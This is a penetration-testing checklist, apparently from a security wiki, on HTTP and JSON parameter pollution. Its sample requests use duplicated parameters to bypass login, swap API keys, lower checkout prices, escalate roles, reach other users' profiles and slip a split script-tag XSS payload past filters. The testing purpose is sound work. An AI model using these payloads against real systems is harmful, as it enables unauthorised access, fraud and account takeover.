HTTP Parameter Pollution
Check List
Methodology
Black Box
Test Query String Pollution
To test for SSPP in query strings, you can insert query syntax characters like #, &, and = into your input and observe how the application responds
Consider a vulnerable application that searches for users based on their username. The request might look like this
GET /usernameSearch?name=jack&returningPath=/mainThe server translates this to an internal API request
GET /usernames/search?name=jack#foo&publicProfile=trueIf the query is truncated, the publicProfile parameter might be bypassed, potentially exposing non-public profiles
Bypassing Authentication
Prepare a test login endpoint that accepts username and password parameters
Record a normal login request
POST /login
username=admin&password=wrongpasswordSend the request with multiple password values
POST /login
username=admin&password=wrongpassword&password=correctpasswordInspect the server response and session behavior (cookies). If authentication succeeds because the last or a specific occurrence is processed, HPP is present
Manipulating SQL Queries (Overwriting id)
Identify the endpoint that reads id and returns a user profile (e.g., /profile?id=...)
Record a normal request and note the response
GET /profile?id=1Send a request with duplicated id parameters
GET /profile?id=1&id=2Tampering with API Calls (API key parameter)
Identify an API endpoint using apikey for authentication (e.g., /api/data?user=123&apikey=...)
Record a request with an invalid key
Send a request with multiple apikey parameters where a valid key appears last
GET /api/data?user=123&apikey=invalid-key&apikey=valid-keyCheck whether access is granted; if the last parameter is used and access is allowed, HPP is confirmed
Altering Price Calculations (E-commerce)
Locate the checkout endpoint that accepts a price parameter
Record a normal purchase request
POST /checkout
product=123&price=100Send the request with duplicate price values
POST /checkout
product=123&price=100&price=1Verify server response, cart totals, or final calculation; if the last price is applied resulting in reduced cost, HPP is present
Bypassing Input Validation and WAF (XSS evasion)
Identify a point that reflects or stores user input (e.g., comment parameter)
Note a simple blocked input example
comment=<script>alert(1)</script>Send input with fragmented/duplicated parameter pieces so the server-side reconstruction may bypass filters, for example
comment=<scr&comment=ipt>alert(1)</scr&comment=ipt>HTTP Parameter Pollution (Privilege Escalation)
First, an attacker identifies a vulnerable endpoint that accepts query parameters. This can be done through manual testing or automated tools like Burp Suite
Next, the attacker crafts a request with duplicate parameters or adds unexpected parameters to the URL
https://example.com/api/user?role=admin&role=userIn this case, if the application does not properly validate the ‘role’ parameter, it might grant admin privileges to the user
The attacker then analyzes the server’s response to see if the manipulation led to any unexpected behavior. Successful exploitation can result in privilege escalation, information disclosure, or even remote code execution, depending on the application’s logic
Broken Access Control
Enter the site and use the Burp Suite tool to identify the points of a site
Identify initial API endpoint
GET /api/v1/user/profile?userId=12345 and send simple request to observe normal server behavior
Check if you can access other accounts by adding another parameter as shown below
GET /api/v1/user/profile?userId=12345&userId=67890If it gives an error, we will keep the value constant, but we will add a parameter and check the behavior of the server
GET /api/v1/user/profile?userId=12345&userId=12345JSON Parameter Pollution In Export Proccess
Check out endpoints that perform the extraction process in different formats, for example the following request in an API Endpoint
POST /api/admin/exportData
Content-Type: application/json
{"format":"csv","filters":{"userId":12345}}In this request, we have to check what will be the answer to the server's request if we add another format parameter, for example
{"format":"csv","format":"json"}If it gives us an error in the answer as below
{"error":"Unexpected token , in JSON at position 15"}Send the next request using capital words as shown below
{"format":"csv","Format":"json"}in Response
{"status":"processing","file":"/exports/data-2023-10-25.json"}JSON Parameter Pollution Authentication bypass
Perform the authentication process and intercept the application process
If there are parameters in the request as below
POST /api/auth/verify
Content-Type: application/json
{"token":"user_token_123","role":"user"}Try to add other parameters to the request as shown below
{"token":"user_token_123","token":"admin_token_abc","role":"user","role":"admin"}The response
{"authenticated": true, "user": "admin", "permissions": ["read","write","delete"]}Test Case in Login Parameter
Enter the site and use the Burp Suite tool to identify the points of a site
Identify initial JSON API endpoint /api/v1/auth/login
and send simple request to observe normal server behavior
{
"username": "alice",
"password": "pass123"
}Test HPP by adding duplicate keys as shown below
{
"username": "alice",
"password": "pass123",
"username": "bob"
}If it processes first value for auth but last for update, we will keep the key constant but duplicate and check the behavior of the server
{
"role": "user",
"role": "admin"
}White Box
Cheat Sheet
Last updated